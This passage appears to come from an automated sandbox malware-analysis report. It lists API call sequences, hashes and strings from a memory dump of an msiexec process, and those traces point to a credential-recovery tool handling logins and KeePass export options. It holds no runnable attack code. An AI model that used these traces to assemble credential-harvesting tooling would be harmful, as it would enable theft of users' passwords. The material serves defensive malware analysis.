                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                            • API String ID: 3330709923-517860148
                                                                                            • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                            • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                            • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                            • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                            APIs
                                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                            • memset.MSVCRT ref: 0040806A
                                                                                            • memset.MSVCRT ref: 0040807F
                                                                                            • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                            • _wcsicmp.MSVCRT ref: 004081C3
                                                                                            • memset.MSVCRT ref: 004081E4
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                            • String ID: logins$null
                                                                                            • API String ID: 2148543256-2163367763
                                                                                            • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                            • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                            • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                            • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            • memset.MSVCRT ref: 004085CF
                                                                                            • memset.MSVCRT ref: 004085F1
                                                                                            • memset.MSVCRT ref: 00408606
                                                                                            • strcmp.MSVCRT ref: 00408645
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                            • memset.MSVCRT ref: 0040870E
                                                                                            • strcmp.MSVCRT ref: 0040876B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                            • String ID: ---
                                                                                            • API String ID: 3437578500-2854292027
                                                                                            • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                            • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041087D
                                                                                            • memset.MSVCRT ref: 00410892
                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1010922700-0
                                                                                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                            APIs
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                            • malloc.MSVCRT ref: 004186B7
                                                                                            • free.MSVCRT ref: 004186C7
                                                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                            • free.MSVCRT ref: 004186E0
                                                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                            • malloc.MSVCRT ref: 004186FE
                                                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                            • free.MSVCRT ref: 00418716
                                                                                            • free.MSVCRT ref: 0041872A
                                                                                            • free.MSVCRT ref: 00418749
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$FullNamePath$malloc$Version
                                                                                            • String ID: |A
                                                                                            • API String ID: 3356672799-1717621600
                                                                                            • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                            • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                            • API String ID: 2081463915-1959339147
                                                                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                            • API String ID: 2012295524-70141382
                                                                                            • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                            • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                            • API String ID: 667068680-3953557276
                                                                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 1700100422-0
                                                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                            • String ID:
                                                                                            • API String ID: 552707033-0
                                                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf
                                                                                            • String ID: %%0.%df
                                                                                            • API String ID: 3473751417-763548558
                                                                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                                            • GetParent.USER32(?), ref: 00406136
                                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                            • String ID: A
                                                                                            • API String ID: 2892645895-3554254475
                                                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                            APIs
                                                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                            • memset.MSVCRT ref: 0040DA23
                                                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                            • String ID: caption
                                                                                            • API String ID: 973020956-4135340389
                                                                                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                            APIs
                                                                                            Strings
                                                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf$wcscpy
                                                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                            • API String ID: 1283228442-2366825230
                                                                                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 00413972
                                                                                            • wcscpy.MSVCRT ref: 00413982
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                            • wcscpy.MSVCRT ref: 004139D1
                                                                                            • wcscat.MSVCRT ref: 004139DC
                                                                                            • memset.MSVCRT ref: 004139B8
                                                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                            • memset.MSVCRT ref: 00413A00
                                                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                            • wcscat.MSVCRT ref: 00413A27
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                            • String ID: \systemroot
                                                                                            • API String ID: 4173585201-1821301763
                                                                                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy
                                                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                            • API String ID: 1284135714-318151290
                                                                                            • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                            • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                            APIs
                                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
